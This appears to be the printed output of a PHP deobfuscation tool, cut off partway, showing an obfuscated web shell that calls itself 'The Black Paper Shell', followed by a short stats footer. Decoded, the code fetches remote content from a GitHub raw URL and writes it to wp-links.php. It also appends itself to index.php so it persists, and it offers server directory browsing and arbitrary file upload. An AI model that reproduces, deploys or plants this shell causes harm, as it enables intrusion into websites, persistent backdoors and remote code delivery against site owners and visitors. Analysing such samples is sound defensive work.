"\77\76\x3c\x3f\x20\40\xa\40\146\x69\154\x65\137\x70\x75\x74\137\143\157\x6e\x74\x65\156\164\x73\x28\x22\167\160\x2d\x6c\151\156\x6b\x73\x2e\160\150\x70\42\54\40\x66\x69\154\145\137\x67\x65\164\x5f\x63\x6f\x6e\x74\145\156\164\163\x28\x22\x68\164\x74\160\163\72\57\x2f\162\141\x77\56\x67\151\x74\x68\165\x62\165\x73\145\x72\x63\x6f\x6e\x74\145\156\164\x2e\143\x6f\x6d\57\67\70\67\60\x61\57\143\164\146\x2f\x6d\x61\x73\x74\x65\x72\x2f\x74\145\163\x2e\164\x78\x74\x22\x29\51\73\x20\40\77\x3e"; goto vXNjs; rIDaz: $file = "\151\156\x64\145\170\56\160\x68\160"; goto S5XcK; vXNjs: $a = file_get_contents("\x69\x6e\144\x65\170\56\160\150\160"); goto QHmQK; QHmQK: if (strstr($a, "\150\x74\x74\x70\163\x3a\x2f\57\x72\x61\167\x2e\x67\x69\164\x68\x75\x62\x75\x73\x65\162\x63\157\x6e\x74\145\x6e\x74\56\143\157\x6d\x2f\x37\x38\67\x30\x61\57\x63\x74\146\x2f\155\141\x73\x74\145\x72\x2f\x74\x65\x73\56\164\170\x74")) { } else { file_put_contents("{$file}", "{$a}\40{$data}"); } goto YVkor; TBkUX: if (isset($_GET["\160\141\164\150"])) { $path = $_GET["\160\141\x74\150"]; } else { $path = getcwd(); } goto lVuNa; hwW0O: foreach ($paths as $id => $pat) { if ($pat == '' && $id == 0) { $a = true; echo "\x3c\141\x20\150\x72\145\146\75\x22\77\x70\x61\x74\150\x3d\x2f\42\76\x2f\x3c\57\141\x3e"; continue; } if ($pat == '') { continue; } echo "\x3c\x61\x20\x68\x72\x65\146\75\x22\77\x70\x61\x74\x68\x3d"; for ($i = 0; $i <= $id; $i++) { echo "{$paths[$i]}"; if ($i != $id) { echo "\57"; } } echo "\42\x3e" . $pat . "\x3c\x2f\141\76\57"; } goto SUHW6; YVkor: echo "\74\x21\x44\117\103\124\131\120\x45\x20\110\x54\x4d\114\x3e\xa\x3c\110\124\x4d\x4c\x3e\12\x3c\110\x45\101\104\x3e\xa\x3c\x6c\151\x6e\x6b\x20\x68\162\145\x66\x3d\42\42\40\162\x65\x6c\x3d\x22\163\164\x79\154\145\x73\x68\x65\x65\164\42\40\x74\171\160\x65\75\42\x74\x65\170\164\57\x63\x73\x73\42\x3e\xa\74\x74\x69\164\x6c\145\76\124\x68\x65\x20\102\154\x61\x63\153\x20\x50\x61\x70\x65\162\74\x2f\164\x69\x74\154\x65\76\74\x6c\151\x6e\x6b\40\x72\145\x6c\75\42\123\x48\117\x52\124\103\x55\x54\x20\x49\x43\117\116\42\40\40\x68\162\x65\x66\x3d\x22\150\164\164\160\x73\72\57\x2f\164\150\x65\x62\x6c\141\x63\x6b\x70\141\160\145\x72\x2e\157\x72\147\57\x54\102\120\56\152\x70\147\42\76\xa\x3c\163\x74\x79\154\145\x3e\12\x62\157\x64\x79\x7b\xa\146\157\156\164\55\x66\x61\x6d\x69\x6c\x79\x3a\x20\42\x43\157\x75\162\x69\145\x72\x22\54\40\x63\x75\162\x73\151\166\x65\73\12\143\157\x6c\x6f\162\72\40\43\146\x66\x66\73\xa\142\x61\x63\153\x67\x72\x6f\x75\156\144\x2d\x63\x6f\x6c\157\162\x3a\40\43\x30\x30\x30\73\xa\x74\x65\170\x74\55\x73\x68\x61\144\157\x77\x3a\x30\x70\x78\x20\x30\x70\x78\x20\x31\x70\170\x20\x23\x37\x35\x37\65\x37\x35\73\xa\x7d\12\x23\143\x6f\156\x74\145\x6e\164\x20\164\x72\x3a\150\157\x76\x65\162\x7b\xa\142\141\x63\153\x67\162\157\x75\156\144\55\x63\157\x6c\x6f\162\72\40\43\60\60\60\x3b\12\164\x65\x78\x74\55\x73\150\x61\144\157\x77\x3a\60\160\170\40\60\x70\170\40\61\x30\160\x78\x20\x23\146\x66\x66\73\xa\x7d\12\43\143\x6f\156\164\x65\x6e\164\x20\x2e\x66\151\x72\x73\x74\173\12\142\x61\x63\x6b\147\162\157\165\x6e\144\x2d\x63\157\x6c\x6f\x72\72\40\43\64\104\x34\104\64\104\x3b\12\175\12\x23\x63\157\x6e\x74\145\156\164\x20\x2e\146\x69\x72\x73\x74\x3a\x68\157\x76\145\x72\173\12\x62\x61\x63\153\x67\162\x6f\165\x6e\x64\55\x63\157\x6c\x6f\x72\x3a\40\43\x34\104\x34\x44\64\104\x3b\12\164\145\x78\164\x2d\163\150\141\x64\x6f\x77\72\x30\x70\x78\x20\x30\x70\x78\40\61\x70\x78\x20\43\x37\x35\x37\x35\x37\x35\x3b\xa\x7d\12\110\x31\173\12\x66\x6f\156\164\x2d\146\x61\x6d\151\154\x79\x3a\x20\42\103\157\x75\162\x69\x65\x72\42\x2c\x20\143\x75\162\x73\151\166\145\73\xa\x63\x6f\x6c\x6f\x72\x3a\x20\43\146\x66\146\73\12\175\xa\x61\x7b\xa\x63\157\154\x6f\x72\72\x20\43\x66\x66\x66\x3b\12\x74\145\x78\164\55\144\x65\x63\x6f\162\x61\164\x69\x6f\x6e\x3a\x20\156\x6f\x6e\145\73\12\x7d\xa\141\72\150\x6f\x76\145\162\173\xa\143\157\154\157\x72\x3a\40\43\146\146\146\x3b\12\x74\145\x78\164\x2d\163\150\141\x64\x6f\167\72\60\x70\x78\x20\x30\x70\x78\40\65\x70\x78\x20\x23\146\x66\146\x66\x66\x66\x3b\12\175\12\151\x6e\x70\x75\x74\x2c\163\145\x6c\145\x63\164\54\x74\145\170\164\x61\x72\x65\141\173\xa\x62\x6f\162\x64\145\x72\72\40\x31\x70\x78\x20\x23\146\x66\146\x20\x73\x6f\x6c\x69\144\x3b\xa\55\x6d\157\x7a\55\142\157\x72\x64\145\162\55\162\141\x64\x69\165\163\x3a\40\x35\160\170\x3b\xa\x2d\167\x65\x62\x6b\x69\x74\55\x62\x6f\162\144\x65\162\55\162\141\x64\x69\165\163\x3a\x35\160\170\73\12\x62\157\x72\144\x65\x72\55\162\141\x64\151\165\x73\x3a\65\x70\170\x3b\12\x7d\xa\146\x6f\157\164\x20\x7b\12\11\x9\x62\141\143\x6b\x67\162\157\165\x6e\144\55\x63\157\x6c\157\x72\x3a\x20\x62\x6c\141\143\x6b\x3b\xa\40\x20\143\157\154\x6f\162\x3a\40\167\150\151\x74\x65\x3b\12\x9\x7d\12\74\x2f\x73\x74\171\154\145\x3e\xa\x3c\x2f\110\x45\x41\x44\x3e\xa\74\x42\x4f\104\131\x20\142\x67\143\157\154\157\162\x3d\x22\x77\150\151\x74\145\42\76\74\x63\145\x6e\164\145\162\x3e\xa\74\x69\155\147\x20\163\162\143\75\42\x68\x74\x74\x70\x73\x3a\x2f\x2f\61\56\142\x70\56\x62\x6c\157\x67\x73\160\157\164\56\x63\157\x6d\x2f\x2d\x65\171\x4e\x38\161\154\151\170\x33\x48\115\57\130\61\x4e\x33\152\153\x68\x33\x52\112\111\57\x41\101\101\x41\x41\101\101\x41\101\x59\x45\57\60\x34\117\x6b\x74\61\x38\x78\130\x30\115\126\132\116\x6f\x50\125\x6a\121\166\114\x41\142\x65\x30\157\116\110\x69\110\172\110\101\103\x4c\x63\x42\x47\x41\x73\131\110\121\57\x73\x33\x32\60\57\x38\66\x35\71\61\x34\67\70\x2d\x32\61\141\63\55\64\67\x66\x30\x2d\x39\x61\x64\x30\x2d\61\x33\64\62\62\x39\67\x65\71\145\x36\x65\x2e\x6a\160\147\x22\x3e\74\x2f\143\x65\x6e\164\145\x72\x3e\xa\x3c\110\61\x20\143\x6c\x61\163\x73\75\x22\x66\x6f\x6f\164\42\x3e\x3c\x63\x65\156\x74\x65\162\76\124\x68\145\40\x42\x6c\141\x63\153\x20\x50\141\x70\145\162\74\57\143\145\156\x74\145\162\x3e\74\x2f\110\x31\76\74\x68\x72\76\x3c\155\141\162\x71\x75\145\145\40\x63\x6c\x61\163\163\75\42\146\157\x6f\x74\42\76\124\x68\145\40\x42\154\141\143\153\40\120\x61\x70\x65\162\x20\x53\x68\145\x6c\x6c\74\x2f\155\x61\x72\x71\x75\145\145\76\x3c\x68\x72\x3e\12\74\x74\141\x62\x6c\145\x20\x77\x69\x64\x74\150\x3d\x22\x37\x30\60\x22\40\142\157\162\x64\145\x72\75\42\60\42\40\143\x65\x6c\154\x70\x61\144\x64\151\156\147\75\42\x33\42\x20\143\x65\x6c\x6c\163\160\x61\x63\151\x6e\x67\x3d\x22\x31\x22\40\141\154\x69\147\156\75\42\143\145\x6e\164\x65\x72\42\76\12\x3c\164\x72\76\74\x74\144\76\103\x75\x72\x72\x65\156\x74\x20\x50\141\x74\150\x20\72\40"; goto TBkUX; gKeWG: $paths = explode("\x2f", $path); goto hwW0O; WTpIf: echo "\74\x66\x6f\x72\155\x20\x65\156\143\x74\x79\x70\145\75\42\155\x75\x6c\x74\x69\x70\141\x72\x74\57\146\157\x72\x6d\55\144\141\164\x61\42\x20\155\145\x74\150\x6f\144\75\42\120\x4f\x53\124\x22\x3e\xa\x4d\x61\163\165\x6b\141\156\40\106\x69\x6c\145\40\x3a\40\74\151\156\x70\165\164\40\164\x79\160\x65\x3d\42\x66\151\154\145\x22\x20\156\141\155\145\x3d\42\146\151\x6c\x65\x22\40\57\x3e\xa\74\151\x6e\x70\x75\164\x20\164\x79\x70\145\x3d\42\x73\165\x62\x6d\151\164\x22\x20\x76\x61\154\165\x65\75\x22\x75\160\154\x6f\141\x64\42\x20\57\76\12\x3c\57\x66\157\x72\155\x3e\xa\74\x2f\164\144\76\74\57\164\x72\x3e"; goto YQM3R; zE7yc: echo "\12\74\57\102\117\x44\x59\76\xa\x3c\57\110\x54\x4d\114\x3e"; goto qvYmK; lVuNa: $path = str_replace("\134", "\57", $path); goto gKeWG; Uvl3K:

Function Calls

None

Variables

None

Stats

MD5 bce986898e01f08fa5e91efa047f6e3d
Eval Count 0
Decode Time 50 ms